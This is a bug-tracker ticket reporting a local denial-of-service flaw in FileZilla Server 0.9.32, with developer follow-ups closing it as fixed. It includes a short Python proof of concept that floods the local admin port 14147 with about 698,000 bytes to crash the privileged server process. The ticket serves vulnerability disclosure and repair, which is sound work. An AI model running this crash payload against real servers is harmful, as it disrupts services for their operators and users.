Opened 14 years ago
Closed 11 years ago
#4693 closed Bug report (fixed)
FileZilla Server version 0.9.32 local denial of service
|Reported by:||Juan Pablo Lopez Yacubian||Owned by:|
|Keywords:||crash, admin, 14147, fixed||Cc:|
|Component version:||Operating system type:||Windows|
|Operating system version:||XP SP3|
The problem is in a local port (14147) that "filezilla server" used for its interface.
If you send some data to this port, that is open in "FileZilla Server Interface.exe", the process "FileZilla server.exe" crash.
I did some test with a debugger and i could not run code.. for me is only a denial of service, but is important repair it becuase this process run with the system privileges.
i wrote a poc in python for test
from socket import * host = "127.0.0.1" port = 14147 data = "A" * 698000 s = socket(AF_INET, SOCK_STREAM) s.connect((host, port)) s.send(data) s.close()
OS : Windows Xp SP3 - all patch
Juan Pablo Lopez Yacubian
Change History (3)
by , 14 years ago
|Attachment:||FileZilla Server.7z added|
comment:1 by , 14 years ago
|Priority:||low → critical|
|Status:||new → moreinfo|
comment:2 by , 11 years ago
|Keywords:||crash admin 14147 fixed added|
|Status:||moreinfo → closed|
This is 3 years old, and a fix was released.
If this problem still occurs on current FzServer, please reopen this ticket.
Thanks for spotting this.
Please try the attached build of FileZilla Server.